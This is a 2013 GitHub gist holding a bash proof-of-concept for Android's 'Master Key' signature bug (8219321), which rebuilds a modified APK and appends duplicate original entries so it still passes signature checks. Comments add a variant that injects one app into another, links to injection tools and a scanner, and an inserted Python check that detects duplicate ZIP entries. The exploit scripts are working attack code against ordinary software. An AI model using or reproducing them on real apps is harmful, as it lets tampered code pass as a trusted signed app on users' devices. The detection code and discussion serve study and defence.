@poliva
Created July 8, 2013 10:35
Quick & dirty PoC for Android bug 8219321 discovered by BlueboxSec
#!/bin/bash
# PoC for Android bug 8219321 by @pof
# +info: https://jira.cyanogenmod.org/browse/CYAN-1602
if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
APK=$1
rm -r out out.apk tmp 2>/dev/null
java -jar apktool.jar d $APK out
#apktool d $APK out
echo "Modify files, when done type 'exit'"
cd out
bash
cd ..
java -jar apktool.jar b out out.apk
#apktool b out out.apk
mkdir tmp
cd tmp/
unzip ../$APK
mv ../out.apk .
cat >poc.py <<-EOF
#!/usr/bin/python
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
for f in `find . -type f |egrep -v "(poc.py|out.apk)"` ; do ./poc.py out.apk "$f" ; done
cp out.apk ../evil-$APK
cd ..
rm -rf tmp out
echo "Modified APK: evil-$APK"
@Fuzion24

Fuzion24 commented Jul 9, 2013

https://github.com/Fuzion24/AndroidMasterKeys/ I built a slightly more resilient tool. This also makes sure not to duplicate files that exist in the original application as well as compress the added files. Python's zip append in the above script will only add files as STORED (no compression).

@BrunoVernay

The apktool options are here: https://code.google.com/p/android-apktool/source/browse/brut.apktool/apktool-cli/src/main/java/brut/apktool/Main.java

  • d: decompile
  • b: build

So you simply decompile, modify and rebuild and ... Android does not recompute the hash ??

@poliva
Author

poliva commented Jul 11, 2013

@BrunoVernay I'm duplicating entries inside the apk (original entries + rebuilt entries). The hashes in META-INF folder are from the original signed files, which are checked for signature, but the ones that end up being installed on the device are the duplicated ones.
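
A defensive check for the condition described in the comment above, added here as an example and not part of the gist or its author's code: it flags any ZIP entry name that appears more than once in an APK's central directory. The function names and the two sample archives are constructed for illustration.

```python
import io
import sys
import warnings
import zipfile
from collections import defaultdict


def duplicate_entries(apk):
    """Map each repeated entry name to its records: (header_offset, crc32, size).

    `apk` is a path or a seekable file-like object.
    """
    seen = defaultdict(list)
    with zipfile.ZipFile(apk) as z:
        # infolist() keeps every central-directory record, duplicates included
        for info in z.infolist():
            seen[info.filename].append(
                (info.header_offset, info.CRC, info.file_size))
    return {name: recs for name, recs in seen.items() if len(recs) > 1}


def is_suspicious(apk):
    # Assumption: a legitimately built APK has unique entry names.
    return bool(duplicate_entries(apk))


def build_sample(entries):
    """Build a constructed in-memory archive from (name, bytes) pairs."""
    buf = io.BytesIO()
    with warnings.catch_warnings():
        # zipfile only warns (UserWarning) when a name is written twice
        warnings.simplefilter("ignore", UserWarning)
        with zipfile.ZipFile(buf, "w") as z:
            for name, data in entries:
                z.writestr(name, data)
    buf.seek(0)
    return buf


# Constructed sample data, not taken from any real application.
CLEAN = [("AndroidManifest.xml", b"<manifest/>"),
         ("classes.dex", b"dex-original")]
TAMPERED = [("AndroidManifest.xml", b"<manifest/>"),
            ("classes.dex", b"dex-rebuilt"),
            ("classes.dex", b"dex-original")]

if __name__ == "__main__":
    for path in sys.argv[1:]:
        for name, recs in duplicate_entries(path).items():
            print(f"{path}: {name} appears {len(recs)} times: {recs}")
```

Differing CRCs for the same name mean the archive carries two different payloads under one path, which is the layout the PoC produces.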

@jbforristal

Have you checked to see exactly which modified/duplicate files are getting installed & actually used? For example, try explicitly changing the AndroidManifest.xml.

@qjerome

qjerome commented Jul 16, 2013

Hi all, I modified the script so that it takes two different files as parameters. This scenario is more realistic if we really want to leverage an attack with this technique. However, in doing so I was not able to install the repackaged application because of the "Failure [INSTALL_PARSE_FAILED_NO_CERTIFICATES]" error raised by ADB. But why does this work when the two applications are the same (I verified that it does not raise any error)? One explanation would be that in order to verify that the application is well signed, the package manager computes a hash of every file in the APK and then verifies that the hash of this list of hashes is well signed. It is possible that the implementation manages the case where duplicated files are in the package. Thus two identical hashes would be in the list only once and thus create a valid signature. I don't know how it is implemented but I would have done so. But to conclude, according to my experiments, this flaw cannot be leveraged by attackers to sign malicious applications with certificates of benign applications. My Cyanogen version is 7.2.0 for WildfireS (not official).

NB: please let me know if I have made a mistake

Here is the modified code:

#!/bin/bash
if [ -z $1 ]; then echo "Usage: $0 <file.apk>" ; exit 1 ; fi
APK=$1
rm -r out out.apk tmp 2>/dev/null
java -jar apktool.jar d $APK out
echo "Modify files, when done type 'exit'"
cd out
bash
cd ..
java -jar apktool.jar b out out.apk
mkdir tmp
cd tmp/
APK=../$2
unzip $APK
mv ../out.apk .
cat >poc.py <<-EOF
#!/usr/bin/python
import zipfile
import sys
z = zipfile.ZipFile(sys.argv[1], "a")
z.write(sys.argv[2])
z.close()
EOF
chmod 755 poc.py
for f in `find . -type f |egrep -v "(poc.py|out.apk)"` ; do ./poc.py out.apk "$f" ; done
cp out.apk ../evil-app.apk
cd ..
rm -rf tmp out
echo "Modified APK: evil-app"

@palani95

Found an open source scanner to detect this on Google Code:

http://code.google.com/p/bluebox-3xp10it-scanner/

@cvem

cvem commented Jul 21, 2013

@poliva Thanks for sharing! :) How can you add duplicate entries inside the apk? Thanks in advance!

@poliva
Author

poliva commented Jul 22, 2013

here's an example that can inject contents of an APK into another:
https://github.com/poliva/random-scripts/blob/master/android/masterkey-apk-inject.sh

@cvem

cvem commented Jul 27, 2013

@poliva Thanks! :)

@esotericnomen

I tried with the script. I've also tried adding a duplicate classes.dex alone in the APK and installing it on the device, but I am unable to install it.

Failure [INSTALL_PARSE_FAILED_CERTIFICATE_ENCODING]
Even with old Android versions. Any idea what I am missing?

@huangtaowy

@esotericnomen have you solved the problem ?

@xiaoxiong0930

I have also met this problem. Are there any solutions?
